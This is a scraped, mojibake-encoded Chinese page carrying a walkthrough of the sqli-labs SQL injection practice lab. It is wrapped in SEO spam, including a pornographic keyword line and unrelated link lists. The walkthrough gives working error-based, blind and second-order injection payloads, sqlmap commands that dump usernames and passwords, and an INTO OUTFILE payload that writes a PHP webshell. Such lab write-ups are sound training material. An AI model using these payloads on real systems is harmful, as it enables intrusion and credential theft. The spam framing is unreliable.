国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁(yè) > news >正文

做外貿(mào)網(wǎng)站好的公司志鴻優(yōu)化設(shè)計(jì)答案網(wǎng)

做外貿(mào)網(wǎng)站好的公司,志鴻優(yōu)化設(shè)計(jì)答案網(wǎng),陜西建設(shè)工程合同備案網(wǎng)站,wordpress去掉rss訂閱文章目錄 總體思路:less-1:less-2:less-3:less-4:less-5:less-6:less-7:less-8:布爾盲注less-9:時(shí)間盲注less-21:less-24: 總體思路: 1、第一件事情 逃脫出單引號(hào)的控制 閉合單引號(hào) 2、單雙引號(hào)需要成對(duì)出現(xiàn) 在python php Java中 3、2個(gè)辦法 繼續(xù)把多出…

文章目錄

          • 總體思路:
            • less-1:
            • less-2:
            • less-3:
            • less-4:
            • less-5:
            • less-6:
            • less-7:
            • less-8:布爾盲注
            • less-9:時(shí)間盲注
            • less-21:
            • less-24:

總體思路:

1、第一件事情 逃脫出單引號(hào)的控制 閉合單引號(hào)
2、單雙引號(hào)需要成對(duì)出現(xiàn) 在python php Java中
3、2個(gè)辦法 繼續(xù)把多出來(lái)的單引號(hào)閉合,要么注釋掉單引號(hào)
4、MySQL注釋符 – # /***/ */ url會(huì)編碼# 要用%23繞過(guò) 規(guī)則:ord(‘#’) hex(35)
5、需要知道聯(lián)合查詢的列數(shù) 求當(dāng)前表的列數(shù)(聯(lián)表查詢必須保證兩個(gè)表列數(shù)一致)
6、需要order by 檢測(cè)他的列數(shù) 列數(shù)3
7、讓第一個(gè)表查詢?yōu)榭?br /> 8、最終目的 注入管理員賬號(hào)密碼
9、首先你要知道管理員表名 列名(利用MySQL自帶的數(shù)據(jù)庫(kù)information_shame)

less-1:

http://127.0.0.1/sqllabs/less-2/?id=1

less-2:

http://127.0.0.1/sqllabs/less-2/?id=1

less-3:

http://127.0.0.1/sqllabs/less-3/?id=1

less-4:

http://127.0.0.1/sqllabs/less-4/?id=1%27

less-5:

1、報(bào)錯(cuò)注入的突破口就是讓頁(yè)面上顯示報(bào)錯(cuò)。
2、比如在本例中把查詢參數(shù)的路徑寫(xiě)錯(cuò),頁(yè)面上只會(huì)顯示查詢不到內(nèi)容,但是不會(huì)報(bào)錯(cuò)。
3、但是如果把查詢參數(shù)的格式符號(hào)寫(xiě)錯(cuò),頁(yè)面上就會(huì)提示出報(bào)錯(cuò)信息:
4、由于路徑錯(cuò)誤,報(bào)錯(cuò)信息中顯示出了路徑信息。
5、于是我們想到,如果在報(bào)錯(cuò)之前執(zhí)行一下select語(yǔ)句,然后在報(bào)錯(cuò)提醒信息那里回顯出我們想要的數(shù)據(jù)信息就好了,這//就是報(bào)錯(cuò)注入。

http://127.0.0.1/sqllabs/less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%203,1),1,32),0x7e),1)--%20   //查到表名
http://127.0.0.1/sqllabs/less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name%20=%20%27users%27%20limit%202,1),1,32),0x7e),1)--%20//查到列名
127.0.0.1/sqllabs/less-5/?id=1%27 and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),1,32),0x7e),1)--+

在這里插入圖片描述

less-6:
sqlmap
less-7:

mysql注入webshell必須滿足:
1、root權(quán)限
2、知道網(wǎng)站物理路徑
3、secure_file_priv 為空(show variables like ‘%secure%’;)

id=1%27))union select 1,2,"<?php phpinfo();" into outfile "E:/phpstudy_pro/www/sqllabs/webshell.php";--+
less-8:布爾盲注
http://127.0.0.1/sqllabs/less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=115--+

我用sqlmap解出來(lái)的:

python sqlmap/sqlmap.py-u http://127.0.0.1/sqllabs/Less-8/?id=1 -dbs		//提取數(shù)據(jù)庫(kù)
python sqlmap/sqlmap py-u http://127.0.0.1/sqllabs/ess-8/?id=1 -D security --tables//表名
python sqlmap/sqlmap.py -u http://127.0.0.1/sqllabs/Less-8/?id=1 -D security -T users --columns //列名
python sqlmap/sqlmap.pyu http://127.0.0.1/sqllabs/Less-8/?id=1 -D security -T users --dump -C "username,password"//用戶名和密碼
less-9:時(shí)間盲注
1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)--

less-10:
sqlmap

less-21:

我發(fā)現(xiàn)不輸入正確的用戶名和密碼就拿不到cookie,由于我知道數(shù)據(jù)庫(kù),所以我嘗試輸入正確的用戶名和密碼就抓包,把post放了之后看到get包里的cookie,由于代碼是對(duì)用戶名先進(jìn)行base64編碼之后再進(jìn)行解碼,所以我在注入的時(shí)候先對(duì)我的uname進(jìn)行sql代碼的base64編碼注入即可

截圖如下:
在這里插入圖片描述

less-24:

看源代碼可知在用戶修改密碼時(shí)又注入sql可能,我先注冊(cè)一個(gè)admin’#用戶單引號(hào)用于合并,#用來(lái)注釋后面的代碼包括’,然后登錄admin’#用戶修改密碼,再進(jìn)入數(shù)據(jù)庫(kù)中可以看到admin用戶的密碼被修改了

在這里插入圖片描述

http://aloenet.com.cn/news/28112.html

相關(guān)文章:

  • 網(wǎng)站產(chǎn)品詳情用哪個(gè)軟件做的sem競(jìng)價(jià)培訓(xùn)班
  • 德國(guó) 網(wǎng)站建設(shè)百度指數(shù)查詢?nèi)肟?/a>
  • 網(wǎng)站做百度推廣需要什么材料百度號(hào)碼認(rèn)證平臺(tái)官網(wǎng)
  • 域名過(guò)期了怎么辦怎么找回網(wǎng)站企業(yè)門(mén)戶網(wǎng)站的設(shè)計(jì)與實(shí)現(xiàn)
  • 建網(wǎng)站方案自媒體推廣渠道
  • 微信微網(wǎng)站平臺(tái)百度優(yōu)化怎么做
  • 做網(wǎng)站需要什么樣的電腦配置太原網(wǎng)站優(yōu)化公司
  • 織夢(mèng)仿非織夢(mèng)網(wǎng)站資源搜索引擎搜索神器網(wǎng)
  • 彩票真人網(wǎng)站建設(shè)有什么功能
  • 找別人做網(wǎng)站的注意事項(xiàng)電商網(wǎng)站設(shè)計(jì)
  • 做網(wǎng)站底色怎么選微信公眾號(hào)運(yùn)營(yíng)
  • 深圳網(wǎng)站設(shè)計(jì)公司哪家便宜廣西seo關(guān)鍵詞怎么優(yōu)化
  • 成都網(wǎng)站建設(shè)愛(ài)特通品牌推廣渠道有哪些
  • 網(wǎng)站自動(dòng)答題腳本怎么做在線網(wǎng)頁(yè)制作網(wǎng)站
  • 富陽(yáng)區(qū)建設(shè)局網(wǎng)站直通車怎么開(kāi)效果最佳
  • 美橙建站五站合一軟件互聯(lián)網(wǎng)精準(zhǔn)營(yíng)銷
  • 本地化吃喝玩樂(lè)平臺(tái)網(wǎng)站可以做嗎武漢seo診斷
  • 網(wǎng)站建設(shè)勞務(wù)協(xié)議seo推廣seo技術(shù)培訓(xùn)
  • 哪些網(wǎng)站可以做問(wèn)卷調(diào)查賺錢(qián)如何檢測(cè)網(wǎng)站是否安全
  • 做網(wǎng)站除了域名還需要什么免費(fèi)廣告發(fā)布平臺(tái)
  • 邯鄲網(wǎng)站建設(shè)哪家好windows優(yōu)化大師怎么使用
  • php做網(wǎng)站中下一步按鈕中國(guó)職業(yè)培訓(xùn)在線平臺(tái)
  • 做網(wǎng)店在素材網(wǎng)站找的圖侵權(quán)嗎地域名網(wǎng)址查詢
  • 水印在線制作網(wǎng)站百度識(shí)圖搜索
  • 校園網(wǎng)站建設(shè) 方案論證一鍵搭建網(wǎng)站
  • 網(wǎng)站目錄架構(gòu)網(wǎng)店代運(yùn)營(yíng)公司靠譜嗎
  • 阿里云服務(wù)器怎么做網(wǎng)站windows優(yōu)化大師官方
  • 網(wǎng)站寬度 1000px長(zhǎng)沙網(wǎng)絡(luò)科技有限公司
  • 做建網(wǎng)站的工作一年賺幾百萬(wàn)百度小說(shuō)app下載
  • 新生活cms訂貨系統(tǒng)網(wǎng)站運(yùn)營(yíng)推廣選擇樂(lè)云seo